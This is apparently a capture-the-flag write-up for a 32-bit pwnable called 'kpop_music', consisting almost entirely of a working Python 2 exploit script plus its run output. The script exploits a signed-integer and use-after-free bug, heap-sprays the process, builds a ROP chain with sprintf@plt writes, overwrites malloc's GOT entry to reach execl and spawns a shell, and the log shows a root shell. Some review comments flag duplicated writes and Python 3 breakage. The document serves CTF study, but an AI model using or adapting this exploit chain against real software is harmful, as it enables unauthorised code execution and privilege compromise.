Category : Pwnables
Summary: signed integer, use-after-free, heap spray, ASLR & DEP bypass
Exploit
#!/usr/bin/python
"""CTF exploit for the ``kpop_music`` binary (Pwnables write-up).

The script never talks to the target itself: it only writes menu input to
stdout, and the shell loop in the write-up pipes that into ``./kpop_music``.
The chain depends on fixed (non-PIE) text/PLT addresses, a writable GOT
entry for ``malloc`` and a known ``execl@libc - malloc@libc`` delta, so PIE
and full RELRO would each break it.  The negative index passed to ``delete``
is presumably the signed-integer bug named in the summary.
"""
import sys
from struct import pack

# Menu-driver helpers: each prints the keystrokes for one menu action
# (1 show, 2 add, 3 modify, 4 delete, matching the binary's menu).
show = lambda : sys.stdout.write("1\n")
add = lambda title, url: sys.stdout.write("2\n"+title+"\n"+url+"\n")
modify = lambda num, title, url: sys.stdout.write("3\n"+"1\n"+num+"\n"+title+"\n"+url+"\n")
delete = lambda num: sys.stdout.write("4\n"+"1\n"+num+"\n")
p = lambda x: pack("<L", x)  # 32-bit little-endian dword

# Gadget and symbol addresses, all fixed inside the non-PIE binary.
lift_esp = 0x08049A72 # add esp, 0x1c; pop ebx; pop esi; pop edi; pop ebp; ret
ppr = 0x08048FD1 # pop ebx; pop ebp; ret
pppr = 0x08049A76 # pop esi; pop edi; pop ebp; ret
pop_ecx = 0x08049ac4 # pop ecx; pop ebx; leave; ret
custom_stack = 0x8f9f120  # NOTE(review): hard-coded writable address; no comment says how it was chosen
sprintf_plt = 0x08048704 # sprintf@plt
malloc_got = 0x0804B434 # malloc@got
format_string = 0x08049b94 # string "%s"

########## ROP payload for bypass ASLR & DEP #########
stage_0 = "" # stage_0 payload just builds custom-stack for stage_1 payload
stage_0 += p(ppr+2)*14 # ret sled
#------- COPY byte codes to generate custom stack ----------#
# Every 5-dword group below is sprintf(dst, "%s", src) via the PLT, with
# pppr discarding the three arguments afterwards; src points at a byte in
# the binary whose value is given in the trailing comment.
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack-4)
stage_0 += p(format_string)
stage_0 += p(0x08048da9) # "\xd0"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack-3)
stage_0 += p(format_string)
stage_0 += p(0x08049875) # "\x8f"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack-2)
stage_0 += p(format_string)
stage_0 += p(0x08049a1b) # "\x00"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack-1)
stage_0 += p(format_string)
stage_0 += p(0x08049a2d) # "\xad"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack)
stage_0 += p(format_string)
stage_0 += p(0x080485d9) # "\x1e"
# NOTE(review): the next group repeats the previous write verbatim (same dst
# and src); it looks redundant rather than intentional.
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack)
stage_0 += p(format_string)
stage_0 += p(0x080485d9) # "\x1e"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack+1)
stage_0 += p(format_string)
stage_0 += p(0x08048a8a) # "\x89"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack+2)
stage_0 += p(format_string)
stage_0 += p(0x080483b6) # "\x04\x08"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack+8)
stage_0 += p(format_string)
stage_0 += p(0x08048028) # "\x34"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack+9)
stage_0 += p(format_string)
stage_0 += p(0x080492ba) # "\x88"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack+10)
stage_0 += p(format_string)
stage_0 += p(0x080483b6) # "\x04\x08"
# NOTE(review): duplicate of the previous group as well.
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack+10)
stage_0 += p(format_string)
stage_0 += p(0x080483b6) # "\x04\x08"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack+16)
stage_0 += p(format_string)
stage_0 += p(0x08048404) # "\x76"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack+17)
stage_0 += p(format_string)
stage_0 += p(0x08049a1a) # "\x84"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack+18)
stage_0 += p(format_string)
stage_0 += p(0x080483b6) # "\x04\x08"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack+20)
stage_0 += p(format_string)
stage_0 += p(0x08049a1b) # "\x00"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack+21)
stage_0 += p(format_string)
stage_0 += p(0x08049a1b) # "\x00"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack+22)
stage_0 += p(format_string)
stage_0 += p(0x08049a1b) # "\x00"
stage_0 += p(sprintf_plt)
stage_0 += p(pppr)
stage_0 += p(custom_stack+23)
stage_0 += p(format_string)
stage_0 += p(0x08049a1b) # "\x00"
#-----------------------------------------------------------#
#-- initialize register & mov stack frame to custom stack --#
stage_0 += p(ppr+1)  # ppr+1 skips "pop ebx", leaving "pop ebp; ret"
stage_0 += p(custom_stack-4)  # popped into ebp
""" execl@libc - malloc@libc = 0x3e7e0 """
stage_0 += p(pop_ecx) # (set ecx to the offset between execl@libc, malloc@libc) & (move stack frame)
stage_0 += p(0x3e7e0) # offset between execl@libc, malloc@libc
#-----------------------------------------------------------#
#- this stage_1 payload will be generated in custom stack --#
# The string below is documentation only (never executed); it spells out the
# dwords that the sprintf writes above leave at custom_stack-4 onwards.
"""
stage_1 = ""
stage_1 += p(0xad008fd0) # malloc@got - 0x5b042464
stage_1 += p(0x0804891e) # add [ebp+0x5b042464] ecx ; pop ebp ;;
stage_1 += p(0xdeadbeef) # dummy
stage_1 += p(0x08048834) # malloc@plt -> now malloc@got points execl@libc
stage_1 += p(0xdeadbeef) # dummy
stage_1 += p(0x08048476) # string "sh"
stage_1 += p(0)
"""
#-----------------------------------------------------------#

#######################################################
##################### ALLOCATE ########################
for i in range(0, 3):
    add("a"*10, "b"*10)
#######################################################
################### HEAP-SPRAY ########################
# NOTE: 0xbb4/4 is integer division only under Python 2 (the shebang's era);
# under Python 3 it is a float and str*float raises TypeError.
for i in range(0, 4000):
    add(p(lift_esp)*(0xbb4/4), p(lift_esp)*(0xbb4/4))
#######################################################
############# PUT ROP PAYLOAD IN STACK ################
add("title", stage_0+"1")
#######################################################
################## TRIGGER VULN #######################
delete("-1073741820")  # negative index string; see summary (signed integer)
modify("3", "A"*0x50, "\x20\x31\x31\x09"*3)
show()
#######################################################
root@ubuntu:~/vuln/500# while [ 1 ] ; do (./exploit.py;cat) | ./kpop_music ; done ==================================================================== __ __ ____ ____ ____ __ _____ _______ __________ / //_// __ \/ __ \/ __ \ / |/ / / / / ___// _/ ____/ / ,< / /_/ / / / / /_/ / / /|_/ / / / /\__ \ / // / / /| |/ ____/ /_/ / ____/ / / / / /_/ /___/ // // /___ /_/ |_/_/ \____/_/ /_/ /_/\____//____/___/\____/ Welcome to the KPOP Music WORLD! ==================================================================== ------------------------ 1. Show kpop song list 2. Add a new kpop song 3. Modify kpop song 4. Delete kpop song 5. Search kpop song 6. Quit ------------------------ MENU> kpop_song title : Youtube URL : [*] successfully added a new song ....................................................................... ....................................................................... 2. Gone not around any longer(SISTAR19) - http://www.youtube.com/watch?v=JtVhwsACgTw 3. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA - id uid=0(root) gid=0(root) 그룹들=0(root) |